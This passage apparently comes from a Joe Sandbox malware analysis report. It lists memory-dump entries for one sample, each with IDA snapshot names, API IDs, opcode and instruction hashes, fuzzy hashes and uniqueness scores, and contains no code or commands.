                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18bd861fd9202132534e428ee4f941ff7dc1ee1229ae49ed05be0e70eee28b2c
                                      • Instruction ID: 98dc81a94b54f27e0191da0a0737b7e85456409114c33badf78dc1a4aef21191
                                      • Opcode Fuzzy Hash: 18bd861fd9202132534e428ee4f941ff7dc1ee1229ae49ed05be0e70eee28b2c
                                      • Instruction Fuzzy Hash: 6F417FB1902705CFCB26DF28C944759F7B1FB94314F65829AC1169BAA6EB30AA81CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 819e693292960a36fe0e1d38087481f6c97ca3accf741abf66166a49ac7d52d4
                                      • Instruction ID: c5349229c793b8c5b626cfbf986cd32910b825ad8ad1cca5e24037888f968fb9
                                      • Opcode Fuzzy Hash: 819e693292960a36fe0e1d38087481f6c97ca3accf741abf66166a49ac7d52d4
                                      • Instruction Fuzzy Hash: D941B4726046529FD321DF6CC884B6BB7E9FF88700F040A19F955DB690E730DA54C7A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b5ab7a23cd433f5424d33fa431cc27b2c15fc5db46e85a97b6e09af3a9f905b5
                                      • Instruction ID: 517d58d49b91fbcb70f0f64200d4bba2cc9ea9b7edc0279e50e79e164d91b15a
                                      • Opcode Fuzzy Hash: b5ab7a23cd433f5424d33fa431cc27b2c15fc5db46e85a97b6e09af3a9f905b5
                                      • Instruction Fuzzy Hash: 4E312731A04644ABDB228BA8CC84BDBFFB8EF54350F0445A5F855D7392C7748988CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bfaf177bfe975cd3a8d87adeba16ce5470412bd7ff73779e6d4f42100e33f255
                                      • Instruction ID: c0b14a0fd6825e6b33a0905f549894afbab9e0ce5d63a4a85d70fdb6cdbf53e7
                                      • Opcode Fuzzy Hash: bfaf177bfe975cd3a8d87adeba16ce5470412bd7ff73779e6d4f42100e33f255
                                      • Instruction Fuzzy Hash: 77318472A042299FDB618B58CC44F9AFBB6EF45B14F1101DDA64CE7244DB709E84CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e224394179127d9b97faabd7dcb0f13a2f486a96f3c4e951b2a3c989068f521e
                                      • Instruction ID: e4004d6419cb8c2a1c5602c2c70c0b0e7817eb38a5a852d3008a2150f678cd69
                                      • Opcode Fuzzy Hash: e224394179127d9b97faabd7dcb0f13a2f486a96f3c4e951b2a3c989068f521e
                                      • Instruction Fuzzy Hash: 4841C031200B499FD763CF28C894BD6BBE5BF59354F448529F95ACB290D770E900CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ff9e3f48bb3636f96571726e4714f7539968be5a7e3342eec26daf9925a5a1a6
                                      • Instruction ID: eea9060d7234b9bb71aaf800c4e5e76fb2a8c8d9ab890fd615b9e6a71c04c6c7
                                      • Opcode Fuzzy Hash: ff9e3f48bb3636f96571726e4714f7539968be5a7e3342eec26daf9925a5a1a6
                                      • Instruction Fuzzy Hash: 963136313083469FE721DA2CC81476AFBD4AB85B50F08896DF585CB285D776E8C1C7D2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 754eb03b8f38cb838cce3bd8baee50404659612e3173c0adfca0a5451760f345
                                      • Instruction ID: ceb92ab3bd2542c3b9f050efe8d8680bd4eecd3cbdb371080ba1707fc9824d9b
                                      • Opcode Fuzzy Hash: 754eb03b8f38cb838cce3bd8baee50404659612e3173c0adfca0a5451760f345
                                      • Instruction Fuzzy Hash: 5731ADB160835A8FCB02DF18D88495ABBE9EF99314F00056AFD51D73A1DB30DD24CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3fb7244ac0d8b54d27e1338e54c787703001e94caa4fe5b6c4b96a1b4ca0292c
                                      • Instruction ID: 4c062cb9a0edc6d14a86d0f6ddcd5e9071808aacf1553800285edaa6c3727054
                                      • Opcode Fuzzy Hash: 3fb7244ac0d8b54d27e1338e54c787703001e94caa4fe5b6c4b96a1b4ca0292c
                                      • Instruction Fuzzy Hash: 1A31C431B002069FD720DFA8C995AAEFBF5EB94704F14456DD506E7294D730EA41CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5fe4f43561de40fd8832459f8e440e218b72c62b7b2d9ba9228e1f6bbc6905ff
                                      • Instruction ID: 0e425787cf85023eb3d75f2a015e0c4dd2878cd845726767efa6a0dbf051478c
                                      • Opcode Fuzzy Hash: 5fe4f43561de40fd8832459f8e440e218b72c62b7b2d9ba9228e1f6bbc6905ff
                                      • Instruction Fuzzy Hash: 4A210B36600B5266CF25AB99CC04ABAFBF9EF42750F008519FE55CA560E730DB44CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9eae7699103519c9b186268e5468de9d2343cc7e8d8d2efcd75e1ac9c8b9432e
                                      • Instruction ID: 0f01ffb2d5797f7cbc993569dba4694cdd975b71fb3a24fe5c9bfc87630f33a9
                                      • Opcode Fuzzy Hash: 9eae7699103519c9b186268e5468de9d2343cc7e8d8d2efcd75e1ac9c8b9432e
                                      • Instruction Fuzzy Hash: 4A3109B15012018BDB31AF58CC45BA6F7B4FF51314F5481ADDA499B386EB34D985CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec7596f883e0afd2828ce057e826c053d197a77b1d53758ff19548f883067b08
                                      • Instruction ID: f83f8fe00293d7b88ee0fbb1b5a9d2d92c190f85b13703defe4b49704e79cac7
                                      • Opcode Fuzzy Hash: ec7596f883e0afd2828ce057e826c053d197a77b1d53758ff19548f883067b08
                                      • Instruction Fuzzy Hash: 6531B131A4052CABDF35DB18DC85FEEF7B9AB15B40F0101A1F645A72A0CA749E898F90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ad8e01034d35d8e14e0dd8c13149db8cb571740e4ce84c620961d7c98562b4ef
                                      • Instruction ID: 8948fcc1e7779da865780fa270a7f73fee052451787f05e6309dc941770d5b77
                                      • Opcode Fuzzy Hash: ad8e01034d35d8e14e0dd8c13149db8cb571740e4ce84c620961d7c98562b4ef
                                      • Instruction Fuzzy Hash: 67319831600604EFEB21CFA8D884F6AB7F9EF44354F1445A9E956CB280EB70EE41CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c454125278f4f8b9e503be68bae0b9b12d89c743c0fd1cc893ea55a1d1768165
                                      • Instruction ID: 43823a83de072ed3813b437919bf0d8f5986e3f1e1e6b94bca3ef55e1c4476bf
                                      • Opcode Fuzzy Hash: c454125278f4f8b9e503be68bae0b9b12d89c743c0fd1cc893ea55a1d1768165
                                      • Instruction Fuzzy Hash: 13316D76600206DFCB1ACF18C8849AEB7B9EF84304B194559EC0ADB355E731EA81CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3cef63d0f2c6875f91d58ffbc34ec305b79d3afbd03826636ea6a46382ee193b
                                      • Instruction ID: 3e133343ffbebf9319bb6b2f31a5820347d05252491be767d8084ebbe9adad2d
                                      • Opcode Fuzzy Hash: 3cef63d0f2c6875f91d58ffbc34ec305b79d3afbd03826636ea6a46382ee193b
                                      • Instruction Fuzzy Hash: 2C21F5312066419FDB22AF1DC984B5AFBA5FFC0F10FA8025DE84247345D775E944CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2abf80ba6e4a86403559bb4562d2c6d18ab40de1755a5bd90482ecf63d4330e
                                      • Instruction ID: 82b1c20a4a750c84e65137fd814fb161764115f451bffcfb33c53f1dd38f6627
                                      • Opcode Fuzzy Hash: b2abf80ba6e4a86403559bb4562d2c6d18ab40de1755a5bd90482ecf63d4330e
                                      • Instruction Fuzzy Hash: 9421AD71900229ABCF21DF59C885ABEF7F4FF08704B544069F841EB254D738AE81CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34b9f30e7b44ee95839287e36b08e3098ecbc04d26975f064864b450e4766ac1
                                      • Instruction ID: 0af81c21fb7ff4e0801957c25d79ffbb5afddbd97656b7f57b53760610e343eb
                                      • Opcode Fuzzy Hash: 34b9f30e7b44ee95839287e36b08e3098ecbc04d26975f064864b450e4766ac1
                                      • Instruction Fuzzy Hash: 9C21CF72200201AFC719CF19C491B6AFBFAFF85760F11416EE4068B2A0E770E940CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3f33474d23350abd92af45689e8a01ed28dbe3225e5f91e7872a1357584b7aec
                                      • Instruction ID: 32fb111b4140f75a5cdbf53af43f1a48d6153126f05af7e507114ea56bc0d87b
                                      • Opcode Fuzzy Hash: 3f33474d23350abd92af45689e8a01ed28dbe3225e5f91e7872a1357584b7aec
                                      • Instruction Fuzzy Hash: A821BE75240701AFCB25DF29C841B56B7F5FF08704F248868E549CB761E770E942CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f9169da2b786d96ba240a814bee562e8e2c29275e5f9c8ce0f5c6b088c385403
                                      • Instruction ID: 5ad270cd42462f09b46a4cd64c2db7f259500d14c6bfc2872f96652a493ce5d0
                                      • Opcode Fuzzy Hash: f9169da2b786d96ba240a814bee562e8e2c29275e5f9c8ce0f5c6b088c385403
                                      • Instruction Fuzzy Hash: 9F215E76A40209DFCB15CF58C580AAEFBB5FB88319F64826DD505AB310DB71AD06CBD1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f1b3182d03af2483895b3333a5d0904722d1ebd5aaee923a23a66eccacccc5e6
                                      • Instruction ID: 8064d6a3f695f64b48c4c5e9cb00863815fddba4055b2371bd016e53c2a7b150
                                      • Opcode Fuzzy Hash: f1b3182d03af2483895b3333a5d0904722d1ebd5aaee923a23a66eccacccc5e6
                                      • Instruction Fuzzy Hash: F411C87B110241AAD7359F65D941B66B7E8FB64B84F284029D901D7358E734DE41CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c6fc188ae0bd6c20ed7de46214aeac23979b26b047dfb27c613c59776941c0b0
                                      • Instruction ID: c97be7cf94df4460698a0f508e4c2044153a2d479560cf0d5c381f4f78efcc7b
                                      • Opcode Fuzzy Hash: c6fc188ae0bd6c20ed7de46214aeac23979b26b047dfb27c613c59776941c0b0
                                      • Instruction Fuzzy Hash: 0011B232A00515AFDB19CF58C815B9DFBB9EF84314F088269EC45E7380E675EE55CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8535b1b779f62de99cdb8e3c552945c66da125a91eed17f480f4412a7fd56400
                                      • Instruction ID: e4d311a0f8a0b5bbb362069bf416d89dbc2b0bd07b77839e8b51eab8c7742ca3
                                      • Opcode Fuzzy Hash: 8535b1b779f62de99cdb8e3c552945c66da125a91eed17f480f4412a7fd56400
                                      • Instruction Fuzzy Hash: 2E11A372240644EFDB228F59D844F56FBA8EBD4B64F484719F90587650C3B1E840CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b786e3ad33a086834c75c97aa45b1ff2a6f5ca674f15997dc92368b63abb870
                                      • Instruction ID: 9e637dfb185e3ec82fb48bed66e988236674041af74f4129e850e21ad6f296a7
                                      • Opcode Fuzzy Hash: 8b786e3ad33a086834c75c97aa45b1ff2a6f5ca674f15997dc92368b63abb870
                                      • Instruction Fuzzy Hash: C301397260010AEB9B04DAE6D984DEFBFBCEF90654F140169AE01D3214E630FA41C660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bfb85c08e866a45ec02c489528233a004c7018581df40f9be56201b33520702c
                                      • Instruction ID: f7d5587c6d57f2f574652d8fc1e95f3f5fde4fc4b51a1257921d13b0383b4666
                                      • Opcode Fuzzy Hash: bfb85c08e866a45ec02c489528233a004c7018581df40f9be56201b33520702c
                                      • Instruction Fuzzy Hash: B311DB76A00719ABDB21DF59C9C0B5EFBB8FF84710F550055EA01B7245D734AE41CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f736f8e0452dd9984dc4334739e3cb472ceae77c8af3fe82d18b47f794b40068
                                      • Instruction ID: 7db3355e58b760f2bff8f110ef8d866c7ffea9b3c89f49de61bc12de190bd09f
                                      • Opcode Fuzzy Hash: f736f8e0452dd9984dc4334739e3cb472ceae77c8af3fe82d18b47f794b40068
                                      • Instruction Fuzzy Hash: 9C11A0726206459FEB15CF68D846B6BBBE8FF45344F058429E985CB311D735EC048FA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e3380984f46f7023348bfcea7addedcb96c9c1d14c3b7d850ab8e57699aec0fe
                                      • Instruction ID: 4d055c67833a4b3985efd22e29d73817f4a3d3bacc42e7e9ed47b8cae072509c
                                      • Opcode Fuzzy Hash: e3380984f46f7023348bfcea7addedcb96c9c1d14c3b7d850ab8e57699aec0fe
                                      • Instruction Fuzzy Hash: FB11C6756016489FD721DF69C888B9EF7F9BF45700F1404AAE901E7695DB34DA40C790
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12f2b9eba6f184562c8623905816f88182d646ee1f4d3bf64f70f4145c2fa916
                                      • Instruction ID: 4f6677081266e1ead77e9bae39c3c0d37bb43f0cb4aa8fc5fe9a2e18ec613ac2
                                      • Opcode Fuzzy Hash: 12f2b9eba6f184562c8623905816f88182d646ee1f4d3bf64f70f4145c2fa916
                                      • Instruction Fuzzy Hash: 7B01D67250AB229BCF318F19E840A66FBE4EF9577070085ADFC958B691D731E505CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 59590092196c153366e45789b00c33b3dcc7a943e993cd355ab33db1f0771354
                                      • Instruction ID: 348f4adc2abf72062c2fede9c28fd86c557b29b3dfe52e7ee64cd975e5e45702
                                      • Opcode Fuzzy Hash: 59590092196c153366e45789b00c33b3dcc7a943e993cd355ab33db1f0771354
                                      • Instruction Fuzzy Hash: 9F117C71941218ABDF26EB64CC4AFE9B3B9AF08714F5441D5B318A60E5EB709E81CF84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a181b3fb7cff2f06ddda282ce289158137ae65c317510c7d3305728f83225e46
                                      • Instruction ID: 8f9e822405c2fe9d2354d7d4df74cf101a32027ce7e9f788a8b3a1e184fcc10d
                                      • Opcode Fuzzy Hash: a181b3fb7cff2f06ddda282ce289158137ae65c317510c7d3305728f83225e46
                                      • Instruction Fuzzy Hash: 5801D472201945BFD7116B29CD98F93F7ACFF54760B010129B505C3515EB24FC01C6A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8925eface6ffd5b3133c963dd4fe61ba23bf7c4c65e6f049241c6e01f0bf5844
                                      • Instruction ID: f6f00e523767a349be128d0c69b189dfc57f44cefdc094afebf6028e13738040
                                      • Opcode Fuzzy Hash: 8925eface6ffd5b3133c963dd4fe61ba23bf7c4c65e6f049241c6e01f0bf5844
                                      • Instruction Fuzzy Hash: 3811AD32450B02DFEB329F09D880B22F7E0FF54766F19886DE6894B5A6C374E880CB10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f107369b6a52718e1e52ff68941650a08f58d42e5883e243965f874f1c62fa0
                                      • Instruction ID: cddc4503f5151f3d9d5fdb5ceb1f696a0edb79f51b4a1b6ca1fec950704f4fd8
                                      • Opcode Fuzzy Hash: 0f107369b6a52718e1e52ff68941650a08f58d42e5883e243965f874f1c62fa0
                                      • Instruction Fuzzy Hash: A6015271A01249ABDB14DFA9D849EAEBBF8EF54754F004456F901EB380D674DA41CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fea6b8dfce3008ce8a93e01f82020a4404a5710e77c17916778dd8fb4bf8b92b
                                      • Instruction ID: 2eb0b117bbb0b8abf5daf794098d59491f50e9c6127994ff8b779866d97bbe30
                                      • Opcode Fuzzy Hash: fea6b8dfce3008ce8a93e01f82020a4404a5710e77c17916778dd8fb4bf8b92b
                                      • Instruction Fuzzy Hash: B5015E71A01249AFDB14EFA9D849FAEBBF8EF45744F404066B904EB280D674DB41CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9a3c45af2dc5072f124e800d26a9d4ae27a01c00ba2e6fa3b7a3c7fd1e1919ad
                                      • Instruction ID: 0e249361c06fd548fc65aee2acc9fc363d6cf6b414a4afa70ace36a25b251bdd
                                      • Opcode Fuzzy Hash: 9a3c45af2dc5072f124e800d26a9d4ae27a01c00ba2e6fa3b7a3c7fd1e1919ad
                                      • Instruction Fuzzy Hash: 9C017B327001089BD7319BA8C804F25B7B9DBC9B24F124155EE11CB2C0CB36DE00C781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7bbd1e74859836e7cfadf1d50b8ebdc496974b91bb0c4aa8c0368c8344435cef
                                      • Instruction ID: d54f283a80ac3bc192b68d52cb86ebf50da110f4e1ccc5a8876b564660c55cb3
                                      • Opcode Fuzzy Hash: 7bbd1e74859836e7cfadf1d50b8ebdc496974b91bb0c4aa8c0368c8344435cef
                                      • Instruction Fuzzy Hash: 45018632300105ABDB119B5EDD44E9EFABCBF84F50F15882DBA06D7650DE30D941CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30a2c3b4c6bf5797f4a23230aa09f3ba09ae25ed0de23c7d890557e1adc9f7b6
                                      • Instruction ID: 5f455109c9f90772de55901e0dee1f3355d81549c5b4f49a2f50e79a337f6a28
                                      • Opcode Fuzzy Hash: 30a2c3b4c6bf5797f4a23230aa09f3ba09ae25ed0de23c7d890557e1adc9f7b6
                                      • Instruction Fuzzy Hash: 7A015271A01249AFDB14DFA9D845FAEBBF8EF54744F444056B900EB280D674DA41CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
